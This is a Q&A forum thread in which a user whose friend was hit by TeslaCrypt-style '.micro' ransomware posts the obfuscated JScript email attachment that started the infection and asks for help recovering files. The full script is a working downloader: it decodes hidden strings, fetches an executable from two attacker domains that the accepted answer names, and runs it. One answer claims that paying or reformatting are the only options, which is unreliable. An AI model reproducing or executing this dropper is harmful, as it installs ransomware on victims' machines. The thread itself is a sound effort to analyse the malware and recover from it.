# new type of malware a.k.a ransomware

Tags: malware

I'm not sure if it is allowed to ask this question here.
I just have a friend with PC which is infected with some sort of "RANSOMWARE" - a type of malware where will encrypt your file/s and ask for payment for decryption.

I managed to take out the root processes of the virus(which encrypt and change all of document, images and video files to "*.micro" files) but recovering the infected data is a bit difficult and not much resources available online yet.

Here is the .js script file that triggers the malware:

```
var _base64Idx = [
/*43 -43 = 0*/
/*'+',  1,  2,  3,'/' */
62, -1, -1, -1, 63,

/*'0','1','2','3','4','5','6','7','8','9' */
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,

/*15, 16, 17,'=', 19, 20, 21 */
-1, -1, -1, 64, -1, -1, -1,

/*65 - 43 = 22*/
/*'A','B','C','D','E','F','G','H','I','J','K','L','M', */
0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12,

/*'N','O','P','Q','R','S','T','U','V','W','X','Y','Z' */
13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25,

/*91 - 43 = 48 */
/*48, 49, 50, 51, 52, 53 */
-1, -1, -1, -1, -1, -1,

/*97 - 43 = 54*/
/*'a','b','c','d','e','f','g','h','i','j','k','l','m' */
26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,

/*'n','o','p','q','r','s','t','u','v','w','x','y','z' */
39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51
];

function decode(input, output, offset) {
var out = output;
if(!out) {
    out = new Uint8Array(Math.ceil(input.length / 4) * 3);
}

// remove all non-base64 characters
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, '');

offset = offset || 0;
var enc1, enc2, enc3, enc4;
var i = 0, j = offset;

while(i < input.length) {
    enc1 = _base64Idx[input.charCodeAt(i++) - 43];
    enc2 = _base64Idx[input.charCodeAt(i++) - 43];
    enc3 = _base64Idx[input.charCodeAt(i++) - 43];
    enc4 = _base64Idx[input.charCodeAt(i++) - 43];

    out[j++] = (enc1 << 2) | (enc2 >> 4);
    if(enc3 !== 64) {
        // decoded at least 2 bytes
        out[j++] = ((enc2 & 15) << 4) | (enc3 >> 2);
        if(enc4 !== 64) {
            // decoded 3 bytes
            out[j++] = ((enc3 & 3) << 6) | enc4;
        }
    }
}

// make sure result is the exact decoded length
return output ?
    (j - offset) :
    out.subarray(0, j);
}

var tEuosqyTkm = function (packedText) {

var buffer = [];
var length = decode(packedText, buffer);
var charCodeAt = "charCodeAt";
var result = "";
for (var i = 0; i < length; i++) {
    result += String.fromCharCode(buffer[i] ^ "bVE6YUkX3beIQAEG"[charCodeAt](i % "bVE6YUkX3beIQAEG".length));
}
return result;
};
var aideN66 = function() {
var vapidAuw = function() {};
vapidAuw.prototype.create = function(disapprobationQvY) {
    return WScript.CreateObject(disapprobationQvY);
};
return vapidAuw;
}();

(function() {
var nettlepkm = new aideN66();
var banterKA3 = 200;
var inspireRpB = tEuosqyTkm('"JRMR"');
var pallidK2I = tEuosqyTkm('"Jy4gVQ=="');
var sultryiRC = tEuosqyTkm('"NQUmRDAlH3ZgCgAlPQ=="');
var constrainedfQW = tEuosqyTkm('"LwUdexVnRQB+Li0dBRE="');
var interpolatevY1 = tEuosqyTkm('"BDx8AAg0ABdDMA=="');
var denouementpK3 = tEuosqyTkm('"KgcBcCwRER56Jw=="');
var gratisE9J = tEuosqyTkm('"CG4EQWAYCg90Lg=="');
var rangeuR2 = tEuosqyTkm('"Jz0LeGwnBWwFIw=="');
var broochIQm = tEuosqyTkm('"MzoheDZsKhddBQ=="');
var smatteringBY6 = tEuosqyTkm('"NhQQXwwiOABAVA=="');
var interminablecBc = tEuosqyTkm('"MzwOBioiPyJwLQ=="');
var sonorousmpK = tEuosqyTkm('"IxIKchs="');
var evidentzgN = tEuosqyTkm('"MSI3Uzg4"');
var convalesceWKQ = tEuosqyTkm('"RwIAewlwNw=="');
var justifyaTv = tEuosqyTkm('"TDM9Uw=="');
var cedeWsU = Math.pow(2, 10) * 249;
var foilgEV = [ tEuosqyTkm('"CiIxRmN6RDBWDgkmKC4wKQU7JFgoJEU7XA9Ke2dvID8H"'), tEuosqyTkm('"CiIxRmN6RDBWDgkmKC4wKQU7JFg/M0U7XA9Ke2dvID8H"') ];
var suavityzSi = 2097152;
var flagHQx = nettlepkm.create(sultryiRC);
var endemicfVU = nettlepkm.create(constrainedfQW);
var evidentv5F = nettlepkm.create(sonorousmpK + tEuosqyTkm('"TA=="') + evidentzgN);
var humbleM87 = flagHQx.ExpandEnvironmentStrings(convalesceWKQ);
var weltPvA = humbleM87 + suavityzSi + justifyaTv;
var roseatef1b = false;
for (var masticatehJi = 0; masticatehJi < foilgEV.length; masticatehJi++) {
    try {
        var invocationIOk = foilgEV[masticatehJi];
        endemicfVU.open(inspireRpB, invocationIOk, false);
        endemicfVU.send();
        if (endemicfVU.status == banterKA3) {
            try {
                evidentv5F.open();
                evidentv5F.type = 1;
                evidentv5F.write(endemicfVU[tEuosqyTkm('"EDM2RjY7GD1xDQEw"')]);
                if (evidentv5F.size > cedeWsU) {
                    masticatehJi = foilgEV.length;
                    evidentv5F.position = 0;
                    evidentv5F.saveToFile(weltPvA, 2);
                    roseatef1b = true;
                }
            } finally {
                evidentv5F.close();
            }
        }
    } catch (ignored) {}
}
if (roseatef1b) {
    flagHQx[pallidK2I](humbleM87 + Math.pow(2, 21));
}
})();
```

Anybody here can help me out on reverse engineering this script to decrypt/recover the encrypted files?

Thank you :)

P.S. FYI, this "ransomware" script circulating through emails as attachment since 9th of Feb 2016.

Comment: http://reverseengineering.stackexchange.com/

Comment: reverseengineering got few users. if anybody here come along on this thread and know the answer, here is the link on my post on reverse engineering (http://reverseengineering.stackexchange.com/questions/11994/ransomware-script-decryption) thanks

Comment: You could try the reverse engineering subreddit but i seriously doubt that someone will make the effort to help you unless getting paid. [rev.eng subreddit](https://www.reddit.com/r/ReverseEngineering/)

Comment: Thanks man. I will try to source out some more info including in subreddit. :)

Comment: .micro is version of the TeslaCrypt ransomware which you can now decrypt with the TeslaCrypt master key due to project being shut down. You can find instructions and decryption tool in this post.
http://www.securityspyware.com/teslacrypt-ransomware-shutdown/

Comment: @ValG Thanks for the info. Myfriend PC was totally re-formatted and no way to recover his files anymore. But indeed, your info provided may help other people who's still struggling from ransomware attacks.

Answer (score 3, accepted):

It just downloads runs an actual executable script.

It tries to get it from `http[colon]//helloyoungmanqq.com/26.exe` first, then `http[colon]//helloyoungmanff.com/26.exe` if that fails. I assume it's the same file, just a backup download site.

All that encoding stuff is just to obfuscate the strings it uses to run the ActiveX stuff that does this (since otherwise it would quite quickly be easily recognized by software and humans alike as malicious).

This script is not your answer...it just leads to the next stuff to look into.

I would highly recommend being very careful with those files should you download them.

Comment: Thanks man, Yeah, look like the script cannot help to reverse back the damage. I will just gonna try to find other recovery methods to decrypt the files instead.

Comment: Sir, can you please expand your answer, this thing is a big issue now...

Answer (score 0):

It's very dangerous to play with Ransomware source codes. You will surely end up losing your data if at all you try to recover from Ransomware. The only way to remove ransomware is either you pay the ransom amount or you just format the system completely without leaving any file in the system.

There are few tools available to remove ransomware but I am not sure about which version of Ransomware you are talking about in this post. There are many Ransomware families that exist and every Ransomware has its own source codes and files!